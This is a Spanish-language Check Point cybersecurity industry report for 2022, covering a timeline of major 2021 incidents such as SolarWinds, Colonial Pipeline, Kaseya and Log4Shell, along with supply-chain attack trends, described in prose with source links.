Informe | Seguridad Cibernética 2022

Informe | Seguridad Cibernética 2022

Explore las tendencias de seguridad cibernética, inteligencia de amenazas, actividad de ransomware, campañas de phishing y técnicas de ataque emergentes que marcaron 2022. Obtenga información para fortalecer la resiliencia y reducir el riesgo de seguridad.

Informe | Seguridad Cibernética 2022

2CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

U S T E D M E R E C E

L A M E J O R S E G U R I D A D

3CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

CAPÍTULO 1: INTRODUCCIÓN A CHECK POINT INFORME SOBRE SEGURIDAD 2022

CAPÍTULO 2: E JE CRONOLÓGICO DE LOS MAYORES E VENTOS CIBERNÉ TICOS DE 2021

CAPÍTULO 3: TENDENCIAS DE SEGURIDAD CIBERNÉ TICA EN 2021 13 De SolarWinds a Log4j

17 El aprovechamiento de los ciberataques

21 Servicios en la nube bajo ataque

25 Desarrollos en el ámbito de la movilidad

28 Grietas en el ecosistema de ransomware

CAPÍTULO 4: DESTACADOS DE MALWARE: EL REGRESO DE EMOTE T

CAPÍTULO 5: ESTADÍSTICAS GLOBALES 41 Estadísticas de malware a nivel global

43 Análisis a nivel global de los principales malware

45 Análisis global de botnets

47 Análisis global de los malware de interceptación

49 Análisis global de criptomineros

51 Análisis global de troyanos bancarios

53 Análisis global de malware móviles

Í N D I C E

05

07

12

31 34

4CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

CAPÍTULO 6: V ULNER ABIL IDADES GLOBALES DE ALTO PERFIL 55 Apache Log4j ‘Log4Shell’ - Ejecución remota de código

(CVE-2021-44228)

56 Omisión de autenticación de “ProxyLogon” en Microsoft Exchange Server (CVE-2021-26855)

56 Atlassian Confluence - Ejecución remota de código (CVE-2021-26084)

CAPÍTULO 7: PRE VENCIÓN DE L A PRÓXIMA PANDEMIA CIBERNÉ TICA: UNA ESTR ATEGIA PAR A ALCANZ AR ME JOR SEGURIDAD

60 Prevención de amenazas: evitar ataques antes de que sucedan

60 Cuando su perímetro está en todos lados y los ataques continúan avanzando, su negocio necesita una prevención precisa con inteli- gencia ante amenazas en tiempo real

61Asegure todo, ya que todo puede ser un objetivo potencial

61 Aprovechar una arquitectura completa unificada

62 Mantener la limpieza de la seguridad

64 Conclusión

APÉNDICE: DESCRIPCIONES DE L A FAMILIA DE MALWARE

54

59

65

5CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 5CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

01 C A P Í T U L O 1

INTRODUCCIÓN AL INFORME SOBRE SEGURIDAD DE CHECK POINT 2022

01

LAS ÚLTIMOS DOCE MESES REPRESENTAN UNO DE LOS MÁS TURBULENTOS Y PERTURBADORES PERÍODOS REGISTRADOS, AL MENOS EN LO QUE RESPECTA A SEGURIDAD.

6CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 6CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

M A Y A H O R O W I T Z VicePresidente de Investigación, Check Point

Las últimos doce meses representan uno de los más turbulentos y perturbadores períodos registrados, al menos en lo que respecta a seguridad. A medida que los gobiernos y los negocios en todo el mundo continuaban navegando por aguas desconocidas de la pandemia global, la llamada “nueva normalidad” aún tenía un gran camino por recorrer. Los esfuerzos de la transformación digital se aceleraron de manera drástica a medida que los negocios adoptaban los arreglos de trabajar de manera híbrida y remota. Pero las mismas preguntas, en torno a la madurez de la seguridad que plagaron muchos negocios en 2020, aún persistieron durante 2021. Mientras algunas de estas preguntas permanecen aún sin responder, los agentes de amenaza no han perdido tiempo de ninguna manera en virar la situación para su propia ventaja. Los ataques cibernéticos están por sobre el 50% del promedio desde que emitimos nuestro último informe anual, con el sector de educación e investigación sufriendo el golpe más grande, en promedio 1605 ataques cada semana durante el año. Como se pronosticó, la brecha de seguridad de SolarWinds parece haber marcado el inicio de una tendencia de ataques en la cadena de suministro que ha persistido durante el año, sin mostrar signos de disminución.

En este Informe sobre Seguridad 2022, le mostraremos los vectores clave de ataque y las técnicas que nuestros investigadores aquí en Check Point Software han observado con el transcurso del tiempo. Desde una nueva generación altamente sofisticada de métodos de ataque a las cadenas de suministro, directamente al aprovechamiento de la vulnerabilidad Log4j que proporcionó cientos de miles de negocios abiertos a una brecha potencial.

Comenzaremos con un resumen mensual de los eventos cibernéticos más importantes del año, antes de hacer un análisis profundo en algunas de las tendencias emergentes que, sin dudas, perfilan el año venidero. Discutiremos los servicios en la nube, los desarrollos en el panorama móvil e IoT, las grietas en el ecosistema de ransomware, el regreso de Emotet y, por supuesto, la vulnerabilidad del día cero de Log4J que indicó un año ya ocupado.

C A P Í T U L O 1

7CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 7CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

C A P Í T U L O 2

02 EJE CRONOLÓGICO DE LOS MAYORES EVENTOS CIBERNÉTICOS DE 2021

EN 2021, PRESENCIAMOS UNA CANTIDAD INUSUALMENTE ALTA DE ATAQUES QUE LLEVARON A INTERRUPCIONES DE LAS VIDAS DIARIAS DE LAS PERSONAS Y, EN ALGUNOS CASOS, AMENAZARON SU SENTIDO DE SEGURIDAD FÍSICA.

8CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

En Enero, el Departamento de Justicia de los Estados Unidos confirmó que había sido afectado por el ataque a la cadena de suministro de Solarwinds y que se había accedido al 3% de las casillas de correo electrónico de sus empleados con el fin de robar datos confidenciales. El departamento tiene más de 100 000 empleados a través de una serie de agencias de cumplimiento de la ley, incluidos el FBI, la Administración de Control de Drogas y el Servicio de Alguaciles de los Estados Unidos. El Departamento de Justicia compró SolarWinds Orion, una herramienta que usaron los hackers para ejecutar su ataque, ocasionando que 18 000 clientes de SolarWinds experimentaran una vulneración. El Departamento de Justicia dijo que se enteró que era una víctima en vísperas de Navidad, revelando que un pequeño porcentaje de sus cuentas de correo electrónico de Microsoft Office 365 habían sido afectadas.

En Febrero, la conocida plataforma de transmisión de música, Spotify, se vio afectada por un ataque de relleno de credenciales, solo tres meses después de un incidente similar. El ataque utilizó credenciales robadas de unas 100 000 cuentas de usuarios y aprovechó una base de datos de inicio de sesión de Spotify maliciosa. El ataque se informó a Spotify, el cual solicitó a la compañía la emisión de un restablecimiento de contraseña a los usuarios afectados que emitieron credenciales robadas e inválidas. La compañía sostuvo en una declaración que también trabajó para tener la base de datos fraudulenta interrumpida por su proveedor de servicios de Internet y advirtió que el ataque no estaba vinculado a la vulneración en la propia seguridad de Spotify. Los cibercriminales llevan adelante la vulneración del relleno de credenciales de las personas que vuelven a usar las mismas contraseñas en múltiples cuentas y plataformas en línea. Los atacantes solo crearon scripts automatizados que intentaban sistemáticamente robar las id. y las contraseñas en muchos tipos de cuentas.

El 2 de Marzo de 2021, Volexity informó el aprovechamiento de la libre circulación de las vulnerabilidades de Microsoft Exchange Server, CVE-2021-26855, CVE-2021- 26857, CVE-2021-26858 y CVE-2021-27065. Una mayor investigación al descubrió que el atacante estaba aprovechando el día cero en la libre circulación. El atacante estaba usando la vulnerabilidad para robar contenido completo de las casillas de correos de muchos usuarios. Esta vulnerabilidad es aprovechable de manera remota y no requiere autenticación, conocimientos especiales o acceso a un entorno específico. Se estimó que 250 000 servidores cayeron víctima de los ataques, incluidos los servidores que pertenecen a alrededor de 30 000 organizaciones en los Estados Unidos y 7000 servidores en el Reino Unido. La Autoridad Bancaria Europea, el Parlamento noruego y la Comisión para el Mercado Financiero (CMF) de Chile también se vieron impactados.

01 ENE

03 MAR

02 FEB

https://www.theguardian.com/technology/2021/jan/06/doj-email-systems-solarwinds-hackers https://www.darkreading.com/attacks-breaches/spotify-hit-with-another-credential-stuffing-attack/d/d-id/1340083 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065 https://www.checkpoint.com/latest-cyber-attacks/microsoft-exchange-hack/ https://www.forbes.com/sites/daveywinder/2021/03/09/eu-banking-authority-hacked-as-microsoft-exchange-attacks-continue/ https://www.forbes.com/sites/daveywinder/2021/03/09/eu-banking-authority-hacked-as-microsoft-exchange-attacks-continue/ https://www.forbes.com/sites/daveywinder/2021/03/09/eu-banking-authority-hacked-as-microsoft-exchange-attacks-continue/?sh=20c0b9f2fe06 https://www.reuters.com/article/us-norway-cyber-idUSKBN2B21TX https://www.bleepingcomputer.com/news/security/chiles-bank-regulator-shares-iocs-after-microsoft-exchange-hack/ https://www.bleepingcomputer.com/news/security/chiles-bank-regulator-shares-iocs-after-microsoft-exchange-hack/

9CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

En Abril, la Agencia de Seguridad Nacional (NSA) de EE. UU., la Agencia de Seguridad Cibernética y Seguridad de Infraestructura (CISA) y la Oficina Federal de Investigación (FBI) publicaron una advertencia conjunta que indicaba que un grupo de APT vinculado a Rusia, APT29, estaba aprovechando cinco vulnerabilidades en un ataque continuo contra objetivos en Estados Unidos. Según el aviso, los agentes del servicio de inteligencia exterior ruso (SVR) (también conocido como APT29, Cozy Bear y The Dukes) usaban frecuentemente vulnerabilidades conocidas para realizar la propagación del escaneo y la explotación frente a los sistemas vulnerables en un esfuerzo por obtener credenciales de autenticación para permitir un mayor acceso. Las actividades recientes del SVR ruso incluyen actualizaciones de software comprometedoras de SolarWinds Orion, cuyo objetivo son las instalaciones de investigación de COVID-19 mediante la implementación del malware WellMess y aprovechando la vulnerabilidad de VMware desde día cero.

En Mayo, un ataque de ransomware apagó las operaciones de rutina Colonial Pipeline, que transporta el 45% del combustible consumido en la costa este de Estados Unidos, incluidos diésel, petróleo y combustible para aviones. El presunto grupo criminal ruso de ransomware DarkSide estaba detrás del ataque. Colonial Pipeline es el oleoducto de productos refinados más grande Estados Unidos, un sistema de 5500 millas (8851 km) implicados en el transporte de 100 millones de galones desde la ciudad de Houston, Texas, hasta el puerto de Nueva York. DarkSide usa el modelo ransomware como servicio (RaaS), donde depende de un programa asociado para ejecutar sus ataques cibernéticos. Colonial Pipeline pagó una exigencia de rescate cercana a los USD 5 millones a cambio de una clave de descifrado. Mas tarde, el FBI declaró que había recuperado la clave privada de la cuenta de rescate y recuperado 63,7 de los bitcoins pagados.

JBS, el gigante de procesador de carne situado en Estados Unidos, fue impactado por un ataque de ransomware en Junio, lo que afectó sus operaciones en Norteamérica y Australia. El FBI atribuyó el ataque al grupo de ransomware REvil. El ataque obligó a JBS a cerrar todas su plantas de res en los Estados Unidos. Una de las plantas canadienses también fue afectada y en la compañía detuvieron la matanza de res y corderos en Australia hasta que las plantas estuvieron de nuevo en línea. El 9 de Junio, el jefe ejecutivo de JBS en Estados Unidos reveló que la compañía pagó USD 11 millones a los hackers en una “decisión muy dolorosa pero necesaria”, pese al hecho de que la compañía pudo ser capaz de restaurar la mayoría de sus sistemas desde sus propios respaldos.

04 ABR

06 JUN

05 MAY

https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks https://www.nytimes.com/2021/05/08/us/politics/cyberattack-colonial-pipeline.html https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom https://www.zdnet.com/article/fbi-attributes-jbs-ransomware-attack-to-revil/ https://www.bloomberg.com/news/articles/2021-05-31/meat-is-latest-cyber-victim-as-hackers-hit-top-supplier-jbs

10CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

En Julio, el grupo REvil ransomware atacó a un proveedor de servicios administrados (Managed Service Providers, MSP) y sus clientes en un ataquea una cadena de suministro. Los agentes de amenaza implantaron de manera exitosa una actualización maliciosa de software para la gestión de parches y la herramienta de monitoreo del cliente en el VSA de la compañía de TI Kaseya. Se estima que 1000 compañías fueron impactadas por el ataque. El ataque masivo a la cadena de suministro llevado a cabo por REvil durante el fin de semana del 4 de Julio impactó en muchos clientes de Kaseya con millones de dólares demandados en el rescate. Kaseya emitió una alerta de seguridad en su sitio, advirtiendo a todos los clientes que inmediatamente apagaran su servidor de VSA para prevenir que el ataque se propagara mientras investigaban. Para vulnerar los servidores de Kaseya VSA, REvil usó una vulnerabilidad de día cero que estaba en proceso de reparación. La vulnerabilidad ha sido previamente divulgada por Kaseya mediante los investigadores de seguridad del Dutch Institute for Vulnerability Disclosure (DIVD) y Kaseya estuvo validando el parche antes de extenderlo a los clientes. Sin embargo, el grupo delictivo de ransomware REvil se adelantó a Kaseya y usó la vulnerabilidad para llevar a cabo su ataque, con rescates que oscilaban entre los USD 45K y los USD 5 millones. El ataque a los servidores de Kaseya VSA permitió que la filial de REvil estuviera inicialmente orientada a los proveedores de servicios administrados (Managed Security Service Provider, MSSP) de Kaseya, con un claro intento de propagación a los clientes de los MSSP. El ataque se amplificó exponencialmente desde los MSSP a los clientes reales.

El más grande ataque visto a la denegación de servicio (DDoS) se detectó en Agosto, con 17,2 millones de solicitudes por segundo. El botnet Mirai facilitó el ataque, cuyo objetivo era una organización en la industria financiera. En este incidente específico, el tráfico originado desde más de 20 000 bots en 125 países en todo el mundo con casi el 15% del ataque originado en Indonesia, seguido por India, Brasil, Vietnam y Ucrania. Mirai fue visto por primera vez en 2016 apuntando a los dispositivos de la Internet de las Cosas (Internet of Things, IoT), como las cámaras de CCTV y los enrutadores. Muchas variantes de botnets han surgido desde entonces, expandiendo la lista de dispositivos a los que se dirigía para incluir a los enrutadores y servidores de los servicios de Android y más.

Check Point Research reconoció un incremento global en el mercado negro para los certificados falsos de vacunación de la COVID-19 en Telegram, después de los anuncios obligatoriedad de la vacuna realizados por el presidente de los Estados Unidos, Biden. El mercado negro se expandió para servir a 28 países, incluidos Austria, Emiratos Árabes Unidos, Reino Unido, Singapur y más. El precio por certificados falsos de vacuna también saltó globalmente, incluido en Estados Unidos, donde se duplicó de 100 USD a 200 USD.

09 SEP

08 AGO

07 JUL

https://thehackernews.com/2021/07/kaseya-revil-ransomware-attack.html http://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689 https://thehackernews.com/2021/08/cloudflare-mitigated-one-of-largest.html https://www.securityweek.com/mirai-botnet-infects-devices-164-countries https://www.securityweek.com/mirai-botnet-infects-devices-164-countries https://blog.checkpoint.com/2021/09/14/amid-vaccine-mandates-fake-vaccine-certificates-become-a-full-blown-industry/

11CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

En Octubre, la infraestructura del grupo delictivo de ransomware REvil establecido en Rusia, responsable de numerosos ataques de ransomware, se vio afectada y controlada a la fuerza por segunda vez en tres meses, deteniendo su operación. Esto acontece después de que las filtraciones de REvil cerrara el sitio web “Happy Blog” en Julio (junto con la desaparición sospechosa de uno de los líderes del grupo delictivo de REvil, “UNKN”) y después de que se restableciera, otra vez, en Septiembre por uno de sus líderes restantes del grupo delictivo. El ransomware REvil se hizo conocido durante 2021 con una serie de ataques devastadores, especialmente después de su exitoso rescate de la compañía alimenticia JBS por un valor de USD 11 millones y después de poner en riesgo a Kaseya, una compañía de gestión de software estadounidense en Julio. Estos ataques cada vez más devastadores coincidieron con una presión cada vez más creciente de las autoridades y el lanzamiento de un ataque ofensivo contra la infraestructura de REvil y sus miembros.

El 14 de Noviembre, Emotet, uno de los más conocidos botnets de la historia, resurgió después de que fuera interrumpido diez meses antes, por una operación internacional de cumplimiento de la ley realizada de manera conjunta. Emotet usó el botnet Trickbot para iniciar su operación, cuando máquinas ya infectadas con el troyano Trickbot, empezó a descargar y ejecutar la versión más reciente de Emotet. Emotet mismo regresó aún más fuerte que antes, con algunos agregados a su caja de herramientas, como el esquema de cifrado actualizado, las ofuscaciones del flujo de control y los nuevos métodos de envío.

El 9 de Diciembre, se informó una vulnerabilidad precisa de ejecución remota de código (RCE) en dos versiones de 2.14.1 y anterior del paquete de registro de Apache Log4j (CVE-2021-44228). Apache Log4j es la biblioteca de registros más conocida de java con más de 400 000 descargas de su proyecto de GitHub. Se usa en muchas compañías en todo el mundo, permitiendo el registro en un amplio conjunto de aplicaciones conocidas. Aprovechar esta vulnerabilidad es simple. La biblioteca de Log4j está incorporada a casi todos los servicios o aplicaciones de Internet conocidas, incluidos Twitter, Amazon, Microsoft, Minecraft y más. Desde el brote, Check Point Research presenció lo que parecía una represión evolutiva con nuevas variaciones de la vulneración original estableciéndose de manera rápida, casi 60 en menos de 24 horas. Esta fue claramente una de las vulnerabilidades más serias de Internet en los años recientes.

10 OCT

12 DIC

11 NOV

https://techcrunch.com/2021/10/18/revil-ransomware-group-goes-dark-after-its-tor-sites-were-hijacked/?guccounter=1 https://www.zdnet.com/article/revil-websites-down-after-governments-pressured-to-take-action-following-kaseya-attack/ https://www.bleepingcomputer.com/news/security/jbs-paid-11-million-to-revil-ransomware-225m-first-demanded/ https://www.zdnet.com/article/updated-kaseya-ransomware-attack-faq-what-we-know-now/ https://www.europol.europa.eu/media-press/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/ https://research.checkpoint.com/2021/the-laconic-log4shell-faq/ https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/

12CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

C A P Í T U L O 3

TENDENCIAS DE SEGURIDAD CIBERNÉTICA EN 2021

03

DURANTE EL 2021, LOS ATAQUES A LA CADENA DE SUMINISTRO CRECIERON TANTO EN FRECUENCIA COMO EN ESCALA. LOS INVESTIGADORES CONCLUYERON EN QUE LOS ATAQUES A LA CADENA DE SUMINISTRO DE SOFTWARE SE INCREMENTARON EN NO MENOS QUE EL 650% DURANTE TODO EL AÑO.

13CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

DE SOLARWINDS A LOG4J Se descubrió el infame ataque a la cadena de suministro SolarWinds en Diciembre de 2020, pero su influencia en el panorama de ataque a la nube, con particular consideración a los ataques de la cadena de suministro, ha generado su inclusión, nuevamente, en nuestro informe. El incidente de SolarWinds originado con un sofisticado malware, Sunburst, ingresó en muchas versiones afectadas del producto de gestión de recursos de TI denominado SolarWinds Orion, usado por 33 000 clientes en todo el mundo. La actualización maliciosa atribuida a “Nobelium”, el grupo de amenaza asociado a la agencia de inteligencia rusa, ingresó en alrededor de 18 000 corporaciones e infectó, de manera exitosa, a aproximadamente 425 compañías pertenecientes a la lista de Fortune 500, como así también a los departamentos del gobierno de los Estados Unidos incluyendo del Departamento de Seguridad Nacional y el Departamento

del Tesoro.

L O T E M F I N K E L S T E E N Director,

Inteligencia sobre amenazas e Investigación

C A P Í T U L O 3

El ataque de SolarWinds fue un hito histórico para la comunidad de la seguridad, no solo por la escala del ataque, sino porque la técnica usada reveló nuevos niveles de sofisticación que incrementaron la amenaza de los ataques de la cadena de suministro de manera más general. La brecha de SolarWinds estableció un nuevo tono y, como se predijo, hemos visto una creciente cantidad de incidentes en la cadena de suministro de software en esta reactivación. Este año pasado, hemos visto incrementarse en seis veces la cantidad de incidentes y todavía existen señales de que las empresas no están preparadas para lidiar con la amenaza”.

https://research.checkpoint.com/2021/solarwinds-explained/ https://krebsonsecurity.com/2020/12/solarwinds-hack-could-affect-18k-customers/ https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/ https://fortune.com/2020/12/15/solarwinds-hackers-u-s-agencies/ https://www.businessinsider.com/solarwinds-hack-explained-government-agencies-cyber-security-2020-12

14CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 14CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Obviamente, los importantes grupos de APT son parte integral de la tendencia. El grupo norcoreano Lazarus comenzó recientemente a focalizarse en los proveedores de servicio de TI para lanzar ataques a la cadena de suministro y una nueva puerta trasera denominada BLINDINGCAN ya se ha usado para dirigirse al proveedor de TI Latvian y a compañía surcoreana de software. Los incidentes adicionales incluyen un ataque contra el proveedor de CCTV llevado a cabo por una sede del grupo delictivo de ransomware DarkSide, en el cual los agentes comprometieron al sitio web del proveedor al infectar con ransomware a sus clientes.

Una de los más importantes ataques a la cadena de suministro de 2021, también ofreció una entrega de ransomware, un proveedor global de software de gestión de TI para los proveedores de servicios administradas (MSP) y los equipos de TI. El ataque fue llevado a cabo por un miembro del programa de afiliados del grupo de ransomware REvil. Según el CEO de Kaseya, se accedió a menos del 0,1% de los clientes de la compañía, pero como algunos de los clientes de Kaseya son MSP, se vieron afectadas tanto como 1500 compañías por el ataque. Los agentes de amenaza aprovecharon de manera inteligente una vulnerabilidad que afectó a los servidores de VSA que tiene acceso a Internet de Kaseya. VSA es una herramienta de monitoreo remoto que se usa comúnmente por los MSP para la gestión de la red y los dispositivos de punto de conexión. Cuando Kaseya descubrió el ataque, la compañía solicitó a sus clientes que apagaran sus servidores de VSA.

Como se describió en nuestro informe anterior, más allá de esta escala sin precedentes, la innovación principal de SolarWinds yace en su técnica. Para obtener acceso a los recursos sensibles de una organización de Microsoft 365, los atacantes usaron primero un token forjado para comprometer las redes locales y en las instalaciones antes de moverse lateralmente al entorno de la nube. En la actualidad, podemos determinar, sin lugar a dudas, el ataque de SolarWinds sienta las bases de rápida alza en los ataques a la cadena de suministro.

Durante el 2021, los ataques a la cadena de suministro crecieron tanto en frecuencia como en escala. Los investigadores llegaron a la conclusión de que los ataques a la cadena de suministro de software se incrementaron en no menos a un 650% en todo el año. Un estudio emitido por la Unión Europea para la Ciberseguridad (European Union Agency for Cybersecurity, ENISA) revisó dos docenas de incidentes y encontró que el 66% de los ataques a la cadena de suministro se cometieron por el aprovechamiento de una vulnerabilidad conocida, mientras que solo un promedio de 16% fueron fallas conocidas de software. La mayoría de los ataques se dirigen, en realidad, al código del software. Al parecer, este año, las organizaciones se vieron sorprendidas sin preparación, una vez más, como determinó una encuesta que el 82% de las compañías designan a proveedores de terceros que enmascaran su cadena de suministro de software con roles altamente privilegiados. El 76% ofrece roles que podrían permitir el control de la cuenta y, peor aún, más del 90% de los equipos de seguridad designados ni siquiera fueron conscientes de que se garantizaron esos permisos.

C A P Í T U L O 3

https://www.darkreading.com/threat-intelligence/north-korea-s-lazarus-group-turns-to-supply-chain-attacks https://securityaffairs.co/wordpress/119051/cyber-crime/unc2465-supply-chain-attack.html https://www.cisa.gov/uscert/kaseya-ransomware-attack https://www.zdnet.com/article/updated-kaseya-ransomware-attack-faq-what-we-know-now/ https://www.cisa.gov/uscert/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021 https://www.cisecurity.org/solarwinds/ https://venturebeat.com/2021/09/15/next-gen-software-supply-chain-attacks-up-650-in-2021/ https://venturebeat.com/2021/09/15/next-gen-software-supply-chain-attacks-up-650-in-2021/ https://portswigger.net/daily-swig/four-fold-increase-in-software-supply-chain-attacks-predicted-in-2021-report https:// https://www.wiz.io/blog/82-of-companies-unknowingly-give-3rd-parties-access-to-all-their-cloud-data

15CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 15CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Este año, el grupo detrás del mismo ataque a SolarWinds reanudó la actividad, utilizando el enfoque desarrollado por el primer ataque y focalizándose, una vez más, en las compañías que son parte de la cadena de suministro global de TI. Sin embargo, esta época, una parte diferente de la cadena está siendo su meta, concretamente los revendedores de la nube y los proveedores de servicio técnico. Estas compañías personalizan, implementan y gestionan servicios en la nube para sus clientes. El grupo de amenaza claramente se basa en el acceso directo de estas compañías para que los entornos de sus clientes obtengan acceso a sus listas completas de cliente en un solo golpe, poniendo en riesgo a un socio de confianza. La operación ha acontecido desde Mayo de 2021 y ya ha impactado a más de 140 revendedores y proveedores, poniendo en riesgo a 14 de ellos. Durante la segunda mitad del año, el grupo de amenaza “Nobelium” ha estado fuertemente activo, con una menos tasa de éxito debido al reconocimiento creciente. El grupo utiliza tácticas múltiples, incluidas el uso de las credenciales robadas obtenidas mediante campañas de información sobre robos a través de un agente de terceros, aprovechando los privilegios de suplantación para recopilar datos de correo protegidos y abusar de la autenticación de multifactor (Multi-Factor Authentication, MFA). La ola de ataque reciente puede indicar un crecimiento en los recursos invertidos por el grupo ruso patrocinado por el estado en el campo de las operaciones de cadena de suministro, como un medio para establecer el acceso persistente a los objetivos

de interés para el gobierno ruso.

A fines de Octubre, el conocido paquete de NPM ‘ua-parser-js’, con millones de descargas semanales, se vio afectado por los atacantes. Durante un período de cuatro horas, los agentes gestionaron la toma de control de la cuenta de NPM del desarrollador e insertaron código malicioso en tres versiones de la biblioteca de NPM. La biblioteca, que se usó para analizar las cadenas del agente del usuario e identificar su servidor, sistema operativo, CPU y más, se usa en miles de proyectos, incluidos los que son propiedad de Facebook, Microsoft, Amazon, Google y Slack. Por lo tanto, el ataque a la cadena de suministro, en la que paquetes afectados de la biblioteca se distribuyeron en vez de los legítimos, permitió que los agentes de amenaza instalen malware en una gran cantidad de dispositivos infectados. En este caso, los dispositivos de Linux y Windows se infectaron con criptomineros e interceptores de contraseñas.

Otro incidente prominente tuvo lugar en Noviembre, cuando un ransomware afectó a muchas empresas de transporte. Esto aconteció después de que un proveedor de servicio de TI en común, Danaos Management Consultants, se viera afectado en el ataque a la cadena de suministro. El incidente afectó a los canales de comunicación de las compañías de transporte, interrumpiendo el contacto con las demás embarcaciones, proveedores y agentes, y generando, además, la pérdida de datos.

C A P Í T U L O 3

https://blogs.microsoft.com/on-the-issues/2021/10/24/new-activity-from-russian-actor-nobelium/ https://www.mandiant.com/resources/russian-targeting-gov-business https://www.mandiant.com/resources/russian-targeting-gov-business https://www.bleepingcomputer.com/news/security/popular-npm-library-hijacked-to-install-password-stealers-miners/ https://www.rapid7.com/blog/post/2021/10/25/npm-library-ua-parser-js-hijacked-what-you-need-to-know/ https://blog.sonatype.com/npm-project-used-by-millions-hijacked-in-supply-chain-attack https://www.maritime-executive.com/article/cyberattack-hits-multiple-greek-shipping-firms https://min.news/en/world/29d72504d76e21799a28f00dcd24012f.html

16CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 16CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Debido a la escala de distribución de la biblioteca, Log4Shell se menciona como la vulnerabilidad más crítica de 2021, con un alcance total de daño aún por determinar. La Apache Foundation lanzó un parche para la vulnerabilidad de RCE pero, pese a ello, se ha observado el escaneo masivo de servidores vulnerables provenientes de múltiples proveedores de seguridad. La tasa de aprovechamiento de la falla de Log4j ha sido inusualmente alta desde poco tiempo después de esta exposición. Check Point Research detectó aproximadamente 40 000 intentos de ataque dos horas después de que fuera revelada la vulnerabilidad de Log4j y 830 000 intentos de ataque en 72 horas en el acontecimiento.

La vulnerabilidad podría permitir potencialmente que los agentes de amenaza accedan a cualquier sistema usando la biblioteca, incluidos los sistemas que se usan para gestionar las redes y recursos del cliente. El daño potencial que podría haber causado esta vulnerabilidad en una biblioteca de fuente abierta demuestra el inmenso riesgo provocado por las cadenas de suministro de software, especialmente en los casos donde un proyecto infrafinanciado, ejecutado por muchos voluntarios a tiempo parcial, es un componente clave en el que confían miles de sistemas

informáticos multimillonarios en todo el mundo.

Justo cuando pensábamos que habíamos finalizado el resumen del panorama de la Cadena de Suministro para 2021, se descubrió la vulnerabilidad del día cero. El paquete Log4j de registro de datos de Apache es la biblioteca más conocida de registro con más de 400 000 descargas diarias y se incorpora a millones de aplicaciones basadas en Java en todo el mundo. Las compañías que usan Log4j como paquete de registro incluyen Cisco, Twitter, Cloudflare, Tesla, Amazon, Apple y más. El paquete Log4j registra los mensajes de error. Según la consultoría Apache Foundation, un atacante capaz de controlar los mensajes de registro o sus parámetros puede ejecutar el código arbitrario desde un servidor externo mediante múltiples protocolos cuando la substitución de búsqueda del mensaje está habilitado. Solo una sola cadena de texto se necesita para vulnerar la falla.

Desde su descubrimiento el 9 de Diciembre, la falla de ‘Log4Shell’, ha estado activamente vulnerada en la red. La vulnerabilidad, designada CVE-2021-44228, podría permitir que un atacante sin autorización ejecute código malicioso o controle el sistema que usa la versión vulnerable de una biblioteca de fuente abierta. No es de extrañar que puntuó con un 10 perfecto sobre 10 en la clasificación del sistema CVSS.

C A P Í T U L O 3

https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html https://logging.apache.org/log4j/2.x/security.html https://www.bitdefender.com/blog/labs/bitdefender-honeypots-signal-active-log4shell-0-day-attacks-underway-patch-immediately/ https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/ https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/ https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html https://logging.apache.org/log4j/2.x/security.html https://twitter.com/DTCERT/status/1469258597930614787

17CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 17CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

O M E R D E M B I N S K Y Gerente del grupo,

Investigación de datos

